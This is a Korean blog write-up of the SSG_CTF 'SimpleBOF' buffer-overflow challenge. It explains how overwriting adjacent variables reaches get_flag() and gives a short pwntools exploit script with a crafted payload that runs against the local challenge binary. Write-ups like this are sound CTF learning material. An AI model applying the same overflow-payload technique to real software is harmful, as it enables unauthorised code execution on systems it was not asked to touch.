ii4gsp

SSG_CTF - SimpleBOF 본문

시스템 해킹/CTF

SSG_CTF - SimpleBOF

ii4gsp 2020. 2. 25. 17:55

IDA로 파일을 열어보면 read()함수로 buf에 0x18 즉, 24byte만큼 입력을받는다.

 

 

 

 

각 변수가 4byte씩 차이가난다.

순서대로 조건을 맞춰주면 get_flag()함수가 실행되어 쉘을 획득한다.

 

 

 

 

flag_ptr은 get_flag()함수를 가리키고있다.

 

 

 

 

Exploit

from pwn import *

p = process('/home/ii4gsp/simpleBOF')

payload = ''
payload += '\x90' * 4
payload += 'FLAG'
payload += p32(0x080484cb)
payload += p32(0x31323334)
payload += p32(0xffffffff)
payload += p32(0xbc614e)

p.sendline(payload)

p.interactive()

'-1'로 전달하면 '-', '1'로 전달되어 2byte가 전달되어 0xffffffff으로 전달해야한다.

 

 

 

 

'시스템 해킹 > CTF' 카테고리의 다른 글

CSAW CTF 2018 Quals - get_it?  (0) 2020.03.03
CSAW CTF 2018 Quals - bigboy  (0) 2020.03.03
[DEFCON 2015] r0pbaby  (0) 2020.02.20
[CODEGATE 2018] BaskinRobbins31  (0) 2020.02.20
[CODEGATE 2018] betting  (0) 2020.02.13
Comments